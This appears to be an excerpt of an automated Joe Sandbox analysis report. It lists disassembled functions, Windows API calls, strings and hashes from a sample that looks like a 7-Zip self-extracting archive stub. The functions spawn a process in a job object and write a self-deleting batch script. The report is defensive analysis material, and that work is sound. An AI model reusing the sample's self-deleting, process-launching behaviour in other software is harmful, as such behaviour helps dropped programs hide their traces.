                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                            • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                            • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                            • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
APIs
• GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
• ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
• GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
• CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
• AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
• SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
• GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
• GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
Similarity
• API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
• String ID: " -$sfxwaitall
• API String ID: 2734624574-3991362806
APIs
• GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
• WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
• CloseHandle.KERNEL32(00419858), ref: 00405445
• SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
• ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
• ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
Similarity
• API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
• String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
• API String ID: 3007203151-3467708659
APIs
• GetClassNameA.USER32(?,?,00000040), ref: 00403140
• lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
• GetWindowLongW.USER32(?,000000F0), ref: 00403160
  • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
  • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
• GetParent.USER32(?), ref: 0040319B
• LoadLibraryA.KERNEL32(riched20), ref: 004031AF
• GetMenu.USER32(?), ref: 004031C2
• SetThreadLocale.KERNEL32(00000419), ref: 004031CF
• CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
• DestroyWindow.USER32(?), ref: 00403210
• SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
• GetSysColor.USER32(0000000F), ref: 00403229
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
• SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
Similarity
• API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
• String ID: RichEdit20W$STATIC$riched20${\rtf
• API String ID: 3514532227-2281146334
APIs
• GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
• LoadIconW.USER32(00000000), ref: 00408717
• GetSystemMetrics.USER32(00000032), ref: 0040872B
• GetSystemMetrics.USER32(00000031), ref: 00408730
• GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
• LoadImageW.USER32(00000000), ref: 0040873C
• SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
• GetDlgItem.USER32(?,000004B2), ref: 00408781
• GetDlgItem.USER32(?,000004B2), ref: 0040878B
• GetWindowLongW.USER32(?,000000F0), ref: 00408797
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
• GetDlgItem.USER32(?,000004B5), ref: 004087B4
• GetDlgItem.USER32(?,000004B5), ref: 004087C2
• GetWindowLongW.USER32(?,000000F0), ref: 004087CE
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
• GetWindow.USER32(?,00000005), ref: 004088C3
• GetWindow.USER32(?,00000005), ref: 004088DF
• GetWindow.USER32(?,00000005), ref: 004088F7
• GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
• LoadIconW.USER32(00000000), ref: 0040895E
• GetDlgItem.USER32(?,000004B1), ref: 0040897D
• SendMessageW.USER32(00000000), ref: 00408980
  • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
  • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
  • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
  • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                            Similarity
                                                                            • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                            • String ID:
                                                                            • API String ID: 3694754696-0
                                                                            • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                            • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                            • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                            • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                            APIs
                                                                            • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                              • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                              • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00618E68,00404926), ref: 0040224B
                                                                              • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00618E68), ref: 0040225B
                                                                              • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                              • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                              • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                            • _wtol.MSVCRT ref: 00404CDF
                                                                            • _wtol.MSVCRT ref: 00404CFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                                            • API String ID: 2725485552-1675048025
                                                                            • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                            • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                            • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                            • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                            APIs
                                                                            • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                            • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                            • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                            • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                            • String ID:
                                                                            • API String ID: 3462224810-0
                                                                            • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                            • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                            • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                            • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                            • GetMenu.USER32(?), ref: 0040202E
                                                                              • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                              • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                              • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                              • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                              • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                              • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                            • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                            • CoInitialize.OLE32(00000000), ref: 00402076
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                              • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                              • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                              • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                              • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                              • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                              • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                              • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                              • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                              • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                              • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                              • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                              • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                              • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                              • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                              • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                            • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                            • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                            • String ID: IMAGES$STATIC
                                                                            • API String ID: 4202116410-1168396491
                                                                            • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                            • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                            • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                            • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                            APIs
                                                                              • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                              • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                            • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                            • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                            • SetFocus.USER32(00000000), ref: 00408C16
                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                            • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                            • IsWindow.USER32(00000000), ref: 00408C89
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                            • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                            • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                              • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                              • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                              • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                              • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                              • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                              • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                              • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                              • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                              • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                              • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                              • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                              • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                              • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                            • String ID:
                                                                            • API String ID: 1057135554-0
                                                                            • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                            • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                            • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                            • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                            • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                            • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                            • GetParent.USER32(?), ref: 00407418
                                                                            • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                            • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                            • GetClientRect.USER32(?,?), ref: 0040753D
                                                                              • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                              • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                            • ClientToScreen.USER32(?,?), ref: 00407446
                                                                              • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                            • String ID:
                                                                            • API String ID: 747815384-0
                                                                            • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                            • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                            • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                            • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                            • String ID:
                                                                            • API String ID: 801014965-0
                                                                            • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                            • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                            • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                            • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00407831
                                                                            • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                            • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                            • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                            • GetWindowDC.USER32(?), ref: 00407896
                                                                            • GetWindowRect.USER32(?,?), ref: 004078A3
